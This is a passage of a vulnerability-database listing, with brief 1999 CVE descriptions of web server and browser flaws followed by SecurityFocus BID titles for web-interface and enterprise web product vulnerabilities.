as used on WebSTAR and other servers, allows remote attackers to read arbitrary files. [CVE-1999-1241] Internet Explorer, with a security setting below Medium, allows remote attackers to execute arbitrary commands via a malicious web page that uses the FileSystemObject ActiveX object. [CVE-1999-1207] Buffer overflow in web-admin tool in NetXRay 2.6 allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long HTTP request. [CVE-1999-1206] SystemSoft SystemWizard package in HP Pavilion PC with Windows 98, and possibly other platforms and operating systems, installs two ActiveX controls that are marked as safe for scripting, which allows remote attackers to execute arbitrary commands via a malicious web page that references (1) the Launch control, or (2) the RegObj control. [CVE-1999-1180] O'Reilly WebSite 1.1e and Website Pro 2.0 allows remote attackers to execute arbitrary commands via shell metacharacters in an argument to (1) args.cmd or (2) args.bat. [CVE-1999-1175] Web Cache Control Protocol (WCCP) in Cisco Cache Engine for Cisco IOS 11.2 and earlier does not use authentication, which allows remote attackers to redirect HTTP traffic to arbitrary hosts via WCCP packets to UDP port 2048. [CVE-1999-1167] Cross-site scripting vulnerability in Third Voice Web annotation utility allows remote users to read sensitive data and generate fake web pages for other Third Voice users by injecting malicious Javascript into an annotation. [CVE-1999-1157] Tcpip.sys in Windows NT 4.0 before SP4 allows remote attackers to cause a denial of service via an ICMP Subnet Mask Address Request packet, when certain multiple IP addresses are bound to the same network interface. [CVE-1999-1155] LakeWeb Mail List CGI script allows remote attackers to execute arbitrary commands via shell metacharacters in the recipient email address. [CVE-1999-1154] LakeWeb Filemail CGI script allows remote attackers to execute arbitrary commands via shell metacharacters in the recipient email address. [CVE-1999-1128] Internet Explorer 3.01 on Windows 95 allows remote malicious web sites to execute arbitrary commands via a .isp file, which is automatically downloaded and executed without prompting the user. [CVE-1999-1125] Oracle Webserver 2.1 and earlier runs setuid root, but the configuration file is owned by the oracle account, which allows any local or remote attacker who obtains access to the oracle account to gain privileges or modify arbitrary files by modifying the configuration file. [CVE-1999-1124] HTTP Client application in ColdFusion allows remote attackers to bypass access restrictions for web pages on other ports by providing the target page to the mainframeset.cfm application, which requests the page from the server, making it look like the request is coming from the local host. [CVE-1999-1110] Windows Media Player ActiveX object as used in Internet Explorer 5.0 returns a specific error code when a file does not exist, which allows remote malicious web sites to determine the existence of files on the client. [CVE-1999-1093] Buffer overflow in the Window.External function in the JScript Scripting Engine in Internet Explorer 4.01 SP1 and earlier allows remote attackers to execute arbitrary commands via a malicious web page. [CVE-1999-1087] Internet Explorer 4 treats a 32-bit number ("dotless IP address") in the a URL as the hostname instead of an IP address, which causes IE to apply Local Intranet Zone settings to the resulting web page, allowing remote malicious web servers to conduct unauthorized activities by using URLs that contain the dotless IP address for their server. [CVE-1999-1083] Directory traversal vulnerability in Jana proxy web server 1.45 allows remote attackers to ready arbitrary files via a .. (dot dot) attack. [CVE-1999-1082] Directory traversal vulnerability in Jana proxy web server 1.40 allows remote attackers to ready arbitrary files via a "......" (modified dot dot) attack. [CVE-1999-1081] Vulnerability in files.pl script in Novell WebServer Examples Toolkit 2 allows remote attackers to read arbitrary files. [CVE-1999-1074] Webmin before 0.5 does not restrict the number of invalid passwords that are entered for a valid username, which could allow remote attackers to gain privileges via brute force password cracking. [CVE-1999-1073] Excite for Web Servers (EWS) 1.1 records the first two characters of a plaintext password in the beginning of the encrypted password, which makes it easier for an attacker to guess passwords via a brute force or dictionary attack. [CVE-1999-1072] Excite for Web Servers (EWS) 1.1 allows local users to gain privileges by obtaining the encrypted password from the world-readable Architext.conf authentication file and replaying the encrypted password in an HTTP request to AT-generated.cgi or AT-admin.cgi. [CVE-1999-1071] Excite for Web Servers (EWS) 1.1 installs the Architext.conf authentication file with world-writeable permissions, which allows local users to gain access to Excite accounts by modifying the file. [CVE-1999-1068] Oracle Webserver 2.1, when serving PL/SQL stored procedures, allows remote attackers to cause a denial of service via a long HTTP GET request. [CVE-1999-1067] SGI MachineInfo CGI program, installed by default on some web servers, prints potentially sensitive system status information, which could be used by remote attackers for information gathering activities. [CVE-1999-1016] Microsoft HTML control as used in (1) Internet Explorer 5.0, (2) FrontPage Express, (3) Outlook Express 5, and (4) Eudora, and possibly others, allows remote malicious web site or HTML emails to cause a denial of service (100% CPU consumption) via large HTML form fields such as text inputs in a table cell. [CVE-1999-1006] Groupwise web server GWWEB.EXE allows remote attackers to determine the real path of the web server via the HELP parameter. [CVE-1999-1005] Groupwise web server GWWEB.EXE allows remote attackers to read arbitrary files with .htm extensions via a .. (dot dot) attack using the HELP parameter. [CVE-1999-0982] The Sun Web-Based Enterprise Management (WBEM) installation script stores a password in plaintext in a world readable file. [CVE-1999-0953] WWWBoard stores encrypted passwords in a password file that is under the web root and thus accessible by remote attackers. [CVE-1999-0944] IBM WebSphere ikeyman tool uses weak encryption to store a password for a key database that is used for SSL connections. [CVE-1999-0943] Buffer overflow in OpenLink 3.2 allows remote attackers to gain privileges via a long GET request to the web configurator. [CVE-1999-0933] TeamTrack web server allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-1999-0929] Novell NetWare with Novell-HTTP-Server or YAWN web servers allows remote attackers to conduct a denial of service via a large number of HTTP GET requests. [CVE-1999-0928] Buffer overflow in SmartDesk WebSuite allows remote attackers to cause a denial of service via a long URL. [CVE-1999-0916] WebTrends software stores account names and passwords in a file which does not have restricted access permissions. [CVE-1999-0915] URL Live! web server allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-1999-0897] iChat ROOMS Webserver allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-1999-0885] Alibaba web server allows remote attackers to execute commands via a pipe character in a malformed URL. [CVE-1999-0883] Zeus web server allows remote attackers to read arbitrary files by specifying the file name in an option to the search engine. [CVE-1999-0882] Falcon web server allows remote attackers to determine the absolute path of the web root via long file names. [CVE-1999-0881] Falcon web server allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-1999-0869] Internet Explorer 3.x to 4.01 allows a remote attacker to insert malicious content into a frame of another web site, aka frame spoofing. [CVE-1999-0858] Internet Explorer 5 allows a remote attacker to modify the IE client's proxy configuration via a malicious Web Proxy Auto-Discovery (WPAD) server. [CVE-1999-0852] IBM WebSphere sets permissions that allow a local user to modify a deinstallation script or its data files stored in /usr/bin. [CVE-1999-0844] Denial of service in MDaemon WorldClient and WebConfig services via a long URL. [CVE-1999-0829] HP Secure Web Console uses weak encryption. [CVE-1999-0771] The web components of Compaq Management Agents and the Compaq Survey Utility allow a remote attacker to read arbitrary files via a .. (dot dot) attack. [CVE-1999-0710] The Squid package in Red Hat Linux 5.2 and 6.0, and other distributions, installs cachemgr.cgi in a public web directory, which allows remote attackers to use it as an intermediary to connect to other systems. [CVE-1999-0699] The Bluestone Sapphire web server allows session hijacking via easily guessable session IDs. [CVE-1999-0695] The Sybase PowerDynamo personal web server allows attackers to read arbitrary files through a .. (dot dot) attack. [CVE-1999-0677] The WebRamp web administration utility has a default password. [CVE-1999-0656] The ugidd RPC interface, by design, allows remote attackers to enumerate valid usernames by specifying arbitrary UIDs that ugidd maps to local user and group names. [CVE-1999-0610] An incorrect configuration of the Webcart CGI program could disclose private information. [CVE-1999-0607] quikstore.cgi in QuikStore shopping cart stores quikstore.cfg under the web document root with insufficient access control, which allows remote attackers to obtain the cleartext administrator password and gain privileges. [CVE-1999-0604] An incorrect configuration of the WebStore 1.0 shopping cart CGI program "web_store.cgi" could disclose private information. [CVE-1999-0537] A configuration in a web browser such as Internet Explorer or Netscape Navigator allows execution of active content such as ActiveX, Java, Javascript, etc. [CVE-1999-0474] The ICQ Webserver allows remote attackers to use .. to access arbitrary files outside of the user's personal directory. [CVE-1999-0469] Internet Explorer 5.0 allows window spoofing, allowing a remote attacker to spoof a legitimate web site and capture information from the client. [CVE-1999-0467] The Webcom CGI Guestbook programs wguest.exe and rguest.exe allow a remote attacker to read arbitrary files using the "template" parameter. [CVE-1999-0440] The byte code verifier component of the Java Virtual Machine (JVM) allows remote execution through malicious web pages. [CVE-1999-0438] Remote attackers can perform a denial of service in WebRamp systems by sending a malicious UDP packet to port 5353, changing its IP address. [CVE-1999-0437] Remote attackers can perform a denial of service in WebRamp systems by sending a malicious string to the HTTP port. [CVE-1999-0412] In IIS and other web servers, an attacker can attack commands as SYSTEM if the server is running as SYSTEM and loading an ISAPI extension. [CVE-1999-0408] Files created from interactive shell sessions in Cobalt RaQ microservers (e.g. .bash_history) are world readable, and thus are accessible from the web server. [CVE-1999-0395] A race condition in the BackWeb Polite Agent Protocol allows an attacker to spoof a BackWeb server. [CVE-1999-0386] Microsoft Personal Web Server and FrontPage Personal Web Server in some Windows systems allows a remote attacker to read files on the server by using a nonstandard URL. [CVE-1999-0379] Microsoft Taskpads allows remote web sites to execute commands on the visiting user's machine via certain methods that are marked as Safe for Scripting. [CVE-1999-0375] Buffer overflow in webd in Network Flight Recorder (NFR) 2.0.2-Research allows remote attackers to execute commands. [CVE-1999-0360] MS Site Server 2.0 with IIS 4 can allow users to upload content, including ASP, to the target web site, thus allowing them to execute commands remotely. [CVE-1999-0347] Internet Explorer 4.01 allows remote attackers to read local files and spoof web pages via a "%01" character in an "about:" Javascript URL, which causes Internet Explorer to use the domain specified after the character. [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL. [CVE-1999-0286] In some NT web servers, appending a space at the end of a URL may allow attackers to read source code for active pages. [CVE-1999-0283] The Java Web Server would allow remote users to obtain the source code for CGI programs. [CVE-1999-0279] Excite for Web Servers (EWS) allows remote command execution via shell metacharacters. [CVE-1999-0268] MetaInfo MetaWeb web server allows users to upload, execute, and read scripts. [CVE-1999-0239] Netscape FastTrack Web server lists files when a lowercase "get" command is used instead of an uppercase GET. [CVE-1999-0235] Buffer overflow in NCSA WebServer (1.4.1 and below) gives remote access. [CVE-1999-0232] Buffer overflow in NCSA WebServer (version 1.5c) gives remote access. [CVE-1999-0222] Denial of service in Cisco IOS web server allows attackers to reboot the router using a long URL. [CVE-1999-0196] websendmail in Webgais 1.0 allows a remote user to access arbitrary files and execute arbitrary code via the receiver parameter ($VAR_receiver variable). [CVE-1999-0178] Buffer overflow in the win-c-sample program (win-c-sample.exe) in the WebSite web server 1.1e allows remote attackers to execute arbitrary code via a long query string. [CVE-1999-0177] The uploader program in the WebSite web server allows a remote attacker to execute arbitrary programs. [CVE-1999-0176] The Webgais program allows a remote user to execute arbitrary commands. [CVE-1999-0175] The convert.bas program in the Novell web server allows a remote attackers to read any file on the system that is internally accessible by the web server. [CVE-1999-0173] FormMail CGI program can be used by web servers other than the host server that the program resides on. [CVE-1999-0151] The SATAN session key may be disclosed if the user points the web browser to other sites, possibly allowing root access. [CVE-1999-0146] The campas CGI program provided with some NCSA web servers allows an attacker to execute arbitrary commands via encoded carriage return characters in the query string, as demonstrated by reading the password file. [CVE-1999-0045] List of arbitrary files on Web host via nph-test-cgi script. [CVE-1999-0039] webdist CGI program (webdist.cgi) in SGI IRIX allows remote attackers to execute arbitrary commands via shell metacharacters in the distloc parameter. [CVE-1999-0031] JavaScript in Internet Explorer 3.x and 4.x, and Netscape 2.x, 3.x and 4.x, allows remote attackers to monitor a user's web activities, aka the Bell Labs vulnerability. [CVE-1999-0012] Some web servers under Microsoft Windows allow remote attackers to bypass access restrictions for files with long file names. SecurityFocus - https://www.securityfocus.com/bid/: [103092] Juniper Junos J-Web Interface CVE-2018-0001 Remote Code Execution Vulnerability [100168] SAP Customer Relationship Management (CRM) WebClient User Interface SQL Injection Vulnerability [92187] Centreon Web Interface Remote Command Execution Vulnerability [91263] Ceragon FibeAir IP-10 Web Interface Authentication Bypass Vulnerability [87283] Winamp Web Interface CVE-2006-6512 Directory Traversal Vulnerability [87272] web interface CVE-2006-6454 Remote Security Vulnerability [82407] SNMP/Web Interface Command Injection and Information Disclosure Vulnerabilities [78736] Cisco DPC3939 (XB3) Router Administrative Web Interface Command Injection Vulnerability [78288] Enigma2 Webinterface CVE-2012-1025 Directory Traversal Vulnerability [78281] Enigma2 Webinterface CVE-2012-1024 Directory Traversal Vulnerability [74936] Freebox OS Web interface Cross Site Request Forgery and Cross Site Scripting Vulnerabilities [74524] WebKit CVE-2015-1156 User Interface URI Spoofing Vulnerability [74256] Cisco Unified MeetingPlace Administrative Web Interface Cross Site Scripting Vulnerability [74033] Barracuda Web Interface Arbitrary Command Injection Vulnerability [72339] D-Link DSL-2740R Web Interface Remote Poisoning Vulnerability [69762] Airties Air6372SO Modem Web Interface 'top.html' Cross Site Scripting Vulnerability [68847] CUPS Web Interface CVE-2014-5031 Incomplete Fix Local Privilege Escalation Vulnerability [68846] CUPS Web Interface CVE-2014-5030 Incomplete Fix Local Privilege Escalation Vulnerability [68842] CUPS Web Interface CVE-2014-5029 Incomplete Fix Local Privilege Escalation Vulnerability [68788] CUPS Web Interface CVE-2014-3537 Local Privilege Escalation Vulnerability [67178] NETGEAR DGN2200 ADSL Router Web Interface HTML Injection Vulnerability [66788] CUPS Web Interface Cross Site Scripting Vulnerability [65227] Cisco Identity Services Engine HTTP Control Interface for NAC Web Cross Site Scripting Vulnerability [65217] OTRS Customer Web Interface Cross Site Request Forgery Vulnerability [65108] Mediatrix 4402 Web Management Interface 'login' Page Cross Site Scripting Vulnerability [64429] Cumin Web Interface Multiple Cross Site Request Forgery Vulnerabilities [64425] Cumin Web Interface Cross Site Scripting Vulnerability [64374] Icinga Web Interface CVE-2013-7106 Multiple Unspecified Buffer Overflow Vulnerabilities [63698] RUCKUS WIRELESS ZoneDirector Guest Pass Provisioning Web Interface HTML Injection Vulnerability [62767] IBM InfoSphere Information Server Web Console Interface Clickjacking Vulnerability [62540] HP ArcSight Enterprise Security Manager Management Web Interface Cross Site Scripting Vulnerability [62098] Supermicro IPMI Web Interface Unspecified Remote Privilege Escalation Vulnerability [62097] Supermicro IPMI Web Interface Unspecified Remote Arbitrary Shell Command Injection [62094] Supermicro IPMI Web Interface Multiple Stack-Based Buffer Overflow Vulnerabilities [58932] AirDroid Web Interface CVE-2013-0134 Cross Site Scripting Vulnerability [54390] SMC Networks SMC8024L2 Switch Web Interface Authentication Bypass Vulnerability [54385] Cisco TelePresence Recording Server Web Interface Remote Command Injection Vulnerability [54253] Novell Groupwise WebAccess 'User.interface' Parameter Directory Traversal Vulnerability [54007] PacketFence 'Web Admin Guest Management' Interface Unspecified Cross Site Scripting Vulnerability [52141] Cisco Small Business SRP500 Series Web Interface CVE-2012-0363 Command Injection Vulnerability [51085] Websense Triton Report Management Interface Cross Site Scripting Vulnerability [50978] HomeSeer HS2 Web Interface Multiple Security Vulnerabilities [50841] Virtual Vertex Muster Web Interface Directory Traversal Vulnerability [50495] Cisco Small Business SRP500 Series Appliances Web Interface Remote Command Injection Vulnerability [50097] Supermicro IPMI Web Interface Multiple Security Bypass Vulnerabilities [48812] Cisco SA 500 Series Appliances Web Management Interface (CVE-2011-2546) SQL Injection Vulnerability [48810] Cisco SA 500 Series Appliances Web Management Interface Remote Command Injection Vulnerability [48063] Anymacro Mail System Web Interface Directory Traversal Vulnerability [48010] AIDeX Mini-Webserver Chat Interface 'Nickname' Field HTML Injection Vulnerability [47988] Cisco RVS4000/WRVS4400N Web Management Interface Information Disclosure Vulnerability [47984] Cisco RVS4000/WRVS4400N Web Management Interface Remote Command Injection Vulnerability [47706] ZyXEL ZyWALL USG Appliances Web Interface Security Bypass Vulnerability [47575] snom VoIP Phone Web Interface Cross Site Scripting And Information Disclosure Vulnerabilities [46537] Mutare Software Enabled VoiceMail (EVM) Web Interface Cross Site Request Forgery Vulnerabilities [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability [45291] Citrix Web Interface Unspecified Cross-Site Scripting Vulnerability [44926] Cisco Unified Videoconferencing Web Interface Weak Session Cookie Session Hijacking Vulnerability [43130] snom VoIP Phone Web Interface HTTP Request Authentication Bypass Vulnerability [41661] D-Link DAP-1160 Web Administration Interface 'formFilter()' Function Buffer Overflow Vulnerability [41389] Sun Java System Web Server Admin Interface Denial of Service Vulnerability [41226] Multiple Snare Agents Web Interface Cross Site Request Forgery Vulnerability [41222] D-Link DAP-1160 Web Administration Interface Security Bypass Vulnerability [41068] WebKit User Interface Cross Domain Spoofing Vulnerability [40897] CUPS Web Interface Information Disclosure Vulnerability [40889] CUPS Web Interface Unspecified Cross Site Request Forgery Vulnerability [40771] snom VoIP Phone Firmware Web Interface Remote Security Bypass Vulnerability [39763] NIBE Heat Pump Web Interface 'exec.cgi' Script Remote Code Execution Vulnerability [39608] Webmoney Web Merchant Interface Component for Joomla! Local File Include Vulnerability [38838] Citrix Web Interface Source Code Information Disclosure Vulnerability [38376] Computer Associates eHealth Performance Manager Web Interface Cross-Site Scripting Vulnerability [37385] IBM Rational ClearQuest CQWeb Interface Password Information Disclosure Vulnerability [36199] VMware Studio Virtual Appliance Web Interface File Upload Directory Traversal Vulnerability [36177] Xerox WorkCentre Web Services Extensible Interface Platform Unauthorized Access Vulnerability [35742] DD-WRT Web Management Interface Remote Arbitrary Shell Command Injection Vulnerability [34761] Citrix Web Interface Unspecified Cross-Site Scripting Vulnerability [34698] Home Web Server Graphical User Interface Remote Denial Of Service Vulnerability [34126] VLC Media Player Web Interface 'input' Parameter Remote Buffer Overflow Vulnerability [32317] Cobbler Web Interface Kickstart Template Remote Privilege Escalation Vulnerability [32156] Nagios Web Interface Privilege Escalation Vulnerability [31943] Citrix Web Interface Security Bypass Vulnerability [30919] Dreambox Web Interface URI Remote Denial of Service Vulnerability [29922] Novell GroupWise WebAccess Simple Interface Cross Site Scripting Vulnerability [29691] Xerox WorkCentre Web Services Extensible Interface Platform Unauthorized Access Vulnerability [28684] Avaya Communication Manager Web Interface Multiple Input Validation Vulnerabilities [28639] F5 BIG-IP Web Management Interface 'NEW_VALUE' Parameter Remote Code Injection Vulnerability [28151] F5 BIG-IP Web Management Interface Console HTML Injection Vulnerability [28122] Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability [27813] Sophos Email Appliance Web Interface Multiple Cross-Site Scripting Vulnerabilities [27720] F5 BIG-IP Web Management Interface Cross-Site Request Forgery Vulnerability [26933] Citrix Web Interface On-line Help Cross-Site Scripting Vulnerability [26381] Cerberus FTP Server Web Interface Cross Site Scripting Vulnerability [25678] Axis Communications 207W Network Camera Web Interface Vulnerabilities [25505] Aztech DSL600EU Router Web Interface IP Spoofing Vulnerability [24879] Webmatic Administration Interface Security Bypass Vulnerability [24388] Packeteer PacketShaper Web Interface Remote Denial of Service Vulnerability [23935] TeamSpeak Server WebAdmin Interface Privilege Escalation Vulnerability [21539] Winamp Web Interface Multiple Remote Vulnerabilities [20836] J-Owamp Web Interface Jowamp_ShowPage.PHP Remote File Include Vulnerability [20124] Cisco IPS/IDS Web Administration Interface Denial Of Service Vulnerability [18704] Cisco Access Point Web Interface Authorization Bypass Vulnerability [15798] Nortel SSL VPN Web Interface Input Validation Vulnerability [15081] GFI MailSecurity for Exchange/SMTP Web Interface Remote Buffer Overflow Vulnerability [15001] Symantec AntiVirus Scan Engine Web Service Administrative Interface Buffer Overflow Vulnerability [14372] Siemens Santis 50 Wireless Router Web Interface Denial Of Service Vulnerability [12984] SonicWALL SOHO Web Interface Multiple Remote Input Validation Vulnerabilities [12968] MaxWebPortal Events And Links Interface Multiple Input Validation Vulnerabilities [12682] Mitel 3300 Integrated Communications Platform Web Interface Authentication Bypass Vulnerability [12142] ZyXEL B-240 Wireless Ethernet Adapter Web Interface Remote Cross-Site Scripting Vulnerability [12136] Macallan Mail Solution Web Interface Authentication Bypass Variant Vulnerability [11779] IPCop Web Administration Interface Proxy Log HTML Injection Vulnerability [11232] Pinnacle ShowCenter Web Interface Skin Denial Of Service Vulnerability [10605] ZaireWeb Solutions Newsletter ZWS Administrative Interface Authentication Bypass Vulnerability [10601] 3Com SuperStack Switch Web Interface Denial Of Service Vulnerability [10490] U.S. Robotics Broadband Router 8003 Administration Web Interface Insecure Password Vulnerability [10426] 3Com OfficeConnect Remote 812 ADSL Router Web Interface Authentication Bypass Vulnerability [9646] Macallan Mail Solution Web Interface Authentication Bypass Vulnerability [9460] WebTrends Reporting Center Management Interface Path Disclosure Vulnerability [9384] Cisco Personal Assistant Web Interface User Password Bypass Vulnerability [9140] IBM Directory Server Web Administration Interface Cross-Site Scripting Vulnerability [9033] FortiGate Firewall Web Interface Cross-Site Scripting Vulnerabilities [8946] Mldonkey Web Interface Error Message Cross-site Scripting Vulnerability [8673] NetUp UTM Web Interface Local Privilege Escalation Vulnerability [8672] NetUP UTM Web Interface utm_stat Script SQL Injection Vulnerability [8671] NetUP UTM Web Interface Session ID SQL Injection Vulnerability [8578] FloosieTek FTGatePro WebAdmin Interface Information Disclosure Weakness [8096] Axis Print Server Web Interface Denial Of Service Vulnerability [7751] Zeus Web Server Admin Interface VS_Diag.CGI Cross Site Scripting Vulnerability [7675] IISProtect Web Administration Interface SQL Injection Vulnerability [7395] Oracle9iAS Web Cache Administration Interface Plaintext Password Vulnerability [7166] Netgear ProSafe VPN Firewall Web Interface Login Denial Of Service Vulnerability [6842] Abyss Web Server Administrative Interface Failed Login Recording Weakness [6824] Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability [6144] Zeus Web Server Admin Interface Cross Site Scripting Vulnerability [5780] HP Compaq Insight Manager Web Interface Cross-Site Scripting Vulnerability [5616] Cisco VPN 3000 Series Concentrator Web Interface Information Disclosure Vulnerability [5329] SEH IC9 Pocket Print Server Web Administrative Interface Password Denial Of Service Vulnerability [4942] Red-M 1050AP Lan Access Point Web Administration Interface Denial of Service Vulnerability [4798] Cisco VoIP Phone Web Interface System Memory Contents Information Leakage Vulnerability [3375] NAI PGP Keyserver Web Administration Interface Authentication Bypassing Vulnerability [1319] Computalynx CMail Web Interface CPU Consumption DoS Vulnerability [1318] Computalynx CMail Web Interface Buffer Overflow Vulnerability [104564] McAfee Web Gateway CVE-2018-6667 Authentication Bypass Vulnerability [104524] Polycom RealPresence Web Suite CVE-2018-12592 Information Disclosure Vulnerability [104508] IBM WebSphere Application Server CVE-2017-1681 Local Information Disclosure Vulnerability [104507] IBM WebSphere Application Server CVE-2017-1741 Information Disclosure Vulnerability [104488] IBM WebSphere MQ CVE-2018-1419 Denial of Service Vulnerability [104421] Cisco WebEx CVE-2018-0356 Cross Site Scripting Vulnerability [104420] Cisco WebEx CVE-2018-0357 Cross Site Scripting Vulnerability [104417] Cisco Web Security Appliance CVE-2018-0353 Remote Security Bypass Vulnerability [104396] EMC RSA Web Threat Detection CVE-2018-1252 SQL Injection Vulnerability [104359] Microsoft Windows WebDAV CVE-2018-8175 Denial of Service Vulnerability [104301] IBM WebSphere Application Server CVE-2013-3024 Local Command Injection Vulnerability [104277] D-Link DIR-629-B1 'weblogin_log' Function Buffer Overflow Vulnerability [104190] Advantech WebAccess ICSA-18-135-01 Multiple Security Vulnerabilities [104134] IBM WebSphere Application Server CVE-2017-1743 Information Disclosure Vulnerability [104128] Multiple Cisco WebEx Network Recording Players CVE-2018-0287 Remote Code Execution Vulnerability [104091] Cisco WebEx Recording Format Player CVE-2018-0288 Information Disclosure Vulnerability [104073] Multiple Cisco WebEx Network Recording Players CVE-2018-0264 Remote Code Execution Vulnerability [103972] Advantech WebAccess HMI Designer Multiple Security Vulnerabilities [103961] WebKit Multiple Memory Corruption Vulnerabilities [103921] Cisco WebEx Connect IM CVE-2018-0276 Cross Site Scripting Vulnerability [103920] Multiple Cisco WebEx Products CVE-2018-0112 Remote Code Execution Vulnerability [103800] Oracle WebCenter Sites CVE-2018-2791 Remote Security Vulnerability [103797] Oracle WebCenter Content CVE-2018-2828 Remote Security Vulnerability [103776] Oracle WebLogic Server CVE-2018-2628 Remote Security Vulnerability [103497] IBM WebSphere Application Server CVE-2017-1788 Spoofing Vulnerability [103430] Fortinet Fortiweb CVE-2017-14191 Access Bypass Vulnerability [103407] Cisco Web Security Appliance CVE-2018-0087 Authentication Bypass Vulnerability [103396] OSIsoft PI Web API Privilege Escalation and Cross Site Scripting Vulnerabilities [103168] IBM WebSphere Portal CVE-2018-1416 Cross Site Scripting Vulnerability [103137] WebKit CVE-2017-7160 Memory Corruption Vulnerability [103089] ABB netCADOPS Web Application CVE-2018-5477 Information Disclosure Vulnerability [103006] SAP ABAP File Interface CVE-2018-2367 Directory Traversal Vulnerability [103002] SAP Customer Relationship Management (CRM) WebClient UI Cross Site Scripting Vulnerability [102973] IBM WebSphere Portal CVE-2018-1401 Cross Site Scripting Vulnerability [102911] IBM WebSphere Application Server CVE-2017-1731 Remote Privilege Escalation Vulnerability [102909] CODESYS Web Server CVE-2018-5440 Stack Based Buffer Overflow Vulnerability [102896] IBM DOORS Web Access CVE-2017-1545 Local Access Bypass Vulnerability [102890] IBM Rational DOORS Web Access CVE-2017-1540 Cross Site Scripting Vulnerability [102872] IBM Rational DOORS Web Access CVE-2017-1515 Information Disclosure Vulnerability [102867] IBM Rational DOORS Web Access CVE-2017-1516 Clickjacking Vulnerability [102862] IBM Rational DOORS Web Access CVE-2017-1563 Cross Site Scripting Vulnerability [102829] HP Web Jetadmin CVE-2017-2742 Unspecified Denial of Service Vulnerability [102781] Advantech WebAccess/SCADA ICSA-18-023-01 Directory Traversal and SQL Injection Vulnerabilities [102778] WebKit CVE-2018-4089 Memory Corruption Vulnerability [102775] WebKit Multiple Memory Corruption Vulnerabilities [102773] Cisco WebEx Meetings Server CVE-2018-0110 Remote Security Vulnerability [102735] Cisco Web Security Appliance CVE-2018-0093 Cross Site Scripting Vulnerability [102723] Cisco WebEx Meetings Server CVE-2018-0111 Information Disclosure Vulnerability [102722] Cisco WebEx Meetings Server CVE-2018-0109 Information Disclosure Vulnerability [102720] Cisco WebEx Meetings Server CVE-2018-0108 XML External Entity Information Disclosure Vulnerability [102573] Oracle WebCenter Sites CVE-2018-2584 Remote Security Vulnerability [102567] Oracle WebLogic Server CVE-2018-2625 Remote Security Vulnerability [102550] Oracle WebCenter Content CVE-2018-2713 Remote Security Vulnerability [102545] Oracle WebCenter Content CVE-2018-2596 Remote Security Vulnerability [102541] Oracle WebCenter Content CVE-2018-2564 Remote Security Vulnerability [102501] IBM WebSphere Portal CVE-2018-1361 Cross Site Scripting Vulnerability [102484] RubyGems 'delayed_job_web' CVE-2017-12097 Cross Site Scripting Vulnerability [102479] IBM WebSphere MQ CVE-2017-1612 Local Privilege Escalation Vulnerability [102444] Oracle WebLogic Server CVE-2017-10334 Remote Security Vulnerability [102442] Oracle WebLogic Server CVE-2017-10352 Remote Security Vulnerability [102424] Advantech WebAccess ICSA-18-004-02 Multiple Security Vulnerabilities [102382] Cisco WebEx Network Recording Player CVE-2018-0104 Remote Code Execution Vulnerability [102369] Cisco WebEx Network Recording Player CVE-2018-0103 Local Buffer Overflow Vulnerability [102339] Webmin 'custom/run.cgi' Cross Site Scripting Vulnerability [102317] ImageMagick 'coders/webp.c' Stack Buffer Overflow Vulnerability [102281] IBM WebSphere Portal CVE-2017-1698 Unspecified Information Disclosure Vulnerability [102255] IBM WebSphere Portal CVE-2017-1423 Information Disclosure Vulnerability [102207] Python 'Lib/webbrowser.py' Remote Command Execution Vulnerability [102186] Cisco WebEx Network Recording Player CVE-2017-12359 Buffer Overflow Vulnerability [102181] WebKit Multiple Memory Corruption Vulnerabilities [102042] IBM WebSphere MQ CVE-2017-1341 Unauthorized Access Vulnerability [102017] Multiple Cisco WebEx Products Multiple Security Vulnerabilities [102007] ZKTeco ZKTime Web CVE-2017-17056 Cross Site Request Forgery Vulnerability [102006] ZKTeco ZKTime Web CVE-2017-17057 Cross Site Scripting Vulnerability [102001] Cisco WebEx Network Recording Player CVE-2017-12360 Denial of Service Vulnerability [102000] Cisco WebEx Meetings Server CVE-2017-12363 Remote Security Bypass Vulnerability [101999] Cisco WebEx Event Center CVE-2017-12365 Information Disclosure Vulnerability [101985] Cisco WebEx Meeting Center CVE-2017-12297 URL Redirection Vulnerability [101984] Cisco WebEx Meeting Center CVE-2017-12366 Cross Site Scripting Vulnerability [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability [101953] Fortinet FortiWebManager CVE-2017-14189 Security Bypass Vulnerability [101932] Cisco Web Security Appliance CVE-2017-12303 Remote Security Bypass Vulnerability [101916] Fortinet Fortiweb CVE-2017-7736 HTML Injection Vulnerability [101894] IBM WebSphere Commerce CVE-2017-1484 Information Disclosure Vulnerability [101793] Roundcube Webmail CVE-2017-16651 Information Disclosure Vulnerability [101685] Advantech WebAccess Multiple Remote Code Execution Vulnerabilities [101654] Cisco WebEx Meetings Server CVE-2017-12294 Cross Site Scripting Vulnerability [101651] Cisco WebEx Meetings Server CVE-2017-12295 Information Disclosure Vulnerability [101492] Cisco WebEx Meetings Server CVE-2017-12293 Denial of Service Vulnerability [101491] Cisco WebEx Meeting Center CVE-2017-12298 Cross Site Scripting Vulnerability [101489] Cisco WebEx Meetings Server CVE-2017-12296 Cross Site Scripting Vulnerability [101432] Oracle Communications WebRTC Session Controller CVE-2017-10153 Remote Security Vulnerability [101408] Oracle WebCenter Sites CVE-2017-10033 Local Security Vulnerability [101392] Oracle WebLogic Server CVE-2017-10336 Remote Security Vulnerability [101374] Oracle iPlanet Web Server CVE-2017-10055 Remote Security Vulnerability [101351] Oracle WebLogic Server CVE-2017-10152 Remote Security Vulnerability [101322] Oracle WebCenter Content CVE-2017-10360 Remote Security Vulnerability [101304] Oracle WebLogic Server CVE-2017-10271 Remote Security Vulnerability [101234] IBM WebSphere Application Server CVE-2017-1503 HTTP Response Splitting Vulnerability [101209] SAP Customer Relationship Management (CRM) IC WebClient Unspecified Spoofing Vulnerability [101207] SAP Netweaver Web Dynpro ABAP Denial of Service Vulnerability [101167] Cisco WebEx Meetings Server CVE-2017-12257 Multiple Cross Site Scripting Vulnerabilities [101104] IBM Integration Bus and WebSphere Message Broker 